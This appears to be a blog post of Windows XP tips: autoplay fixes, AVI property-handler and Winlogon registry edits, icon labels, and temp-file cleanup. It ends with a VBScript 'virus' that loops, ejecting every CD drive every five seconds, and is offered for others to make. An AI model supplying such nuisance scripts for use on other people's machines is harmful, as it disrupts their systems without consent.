Enable Autoplay Of CD ROM

              CD ROM STOPS AUTOPLAYING/AUTORUN.!!

And the AutoPlay Tab has disappeared in My Computer, Devices With Removable Storage, Right Click on CDROM, Properties.

Solution: The service: “Shell Hardware Detection” has been set to Manual or Disabled. 
Go to Control Panel, Administrative Tools, Services. Return this service to “Automatic”.

CLICKING .AVI FILES ON EXPLORER CAUSING 100% CPU USAGE SOLUTION

Well Windows Seem To Have a REALLY Big Problem When It comes to Reading AVI Files. It seems that When You Click On An AVI File In Explorer, It’ll Try To Read The Entire AVI File To Determine The Width, Height, etc. of The AVI File (This is Displayed in The Properties Window). Now The Problem With Windows Is That If You Have a Broken/Not Fully Downloaded AVI File That Doesnt Contain This Info, Windows will Scan The Entire AVI File Trying To Figure Out All These Properties Which in The Process ill wprobably Cause 100% CPU Usage And Heavy Memory Usage. To Solve This Problem All You Have To Do This the following:


1. Open up regedit [ Goto Run > Type regedit and press Enter ]


2. Goto HKEY_CLASSES_ROOT\SystemFileAssociations\.avi\shellex\PropertyHandler


3. Delete the “Default” value which should be “{87D62D94-71B3-4b9a-9489-5FE6850DC73E}”
Voila! Please note that this will no longer provide you with the windows properties displaying the AVI file information such as width, height, bitrate etc. But its a small price to pay for saving you resources.
NOTE: Please use caution when using regedit. Improper usage may cause windows to behave imcorrectly.  Backup your registry first. 

Make Desktop Icons Transparent

              
Hello Friends Again I am Posting A Amazing Post About To Make Transparent Icons On Desktop
Do This Steps >
Go to Control Panel > System > Advanced > Performance area > Settings button Visual Effects tab “Use drop shadows for icon labels on the Desktop”

Thanx For Reading Pass Comments Or Share The post

Make a Message Which Displays On Startup Of Windows

                       DISPLAY MESSAGE ON STARTUP.

Start regedit By Going To Start Menu > Run > regedit And Enter And Then : 

Goto The Given Bellow :



HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows NT>CurrentVersion>Winlogon
Modify the key legalnoticecaption with what you want to name the window.
Modify the key legalnoticetext with what you want the window to say. Restart!!!!

                THANX FOR READING PLEASE PASS COMMENTS OR SHARE THE POST

Delete Temporary Files Automatically

              AUTO DELETE TEMPORARY FOLDER.!!

All what i prefer is ” %temp%  ” without quotes.. at Start -> Run……
This opens ur temp folder And Then  You Can Erase It Neatly// still try dis one too..

First go into gpedit.msc By Run Open Run From Start Menu > Type Gpedit.msc And Press Enter


Next select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder

Then right click “Do Not Delete Temp Folder Upon Exit”
Go to properties and Hit Disable. Now Next Time Windows Puts a Temp File In That Folder it Will Automatically Delete it When Its Done!


Note: From Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro.!!!!!!!!

Make Virus Which Ejects CD ROM Continously

Make a Virus Which Automatically Ejects The Cd rom Continously

Copy The Given Code And Paste It To A New Text Document File And Save With .vbs File Extension.
By Going To File>Save as> and then Name The File Anything Like Virus.vbs Or Like Cdrom.vbs

How To Stop : If You Want To Stop It Goto Task Manager { Ctrl+Shift+Esc} And Goto Processes Tab And Then Locate The Wscript And Then Right Click On Wscript > End Process





Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop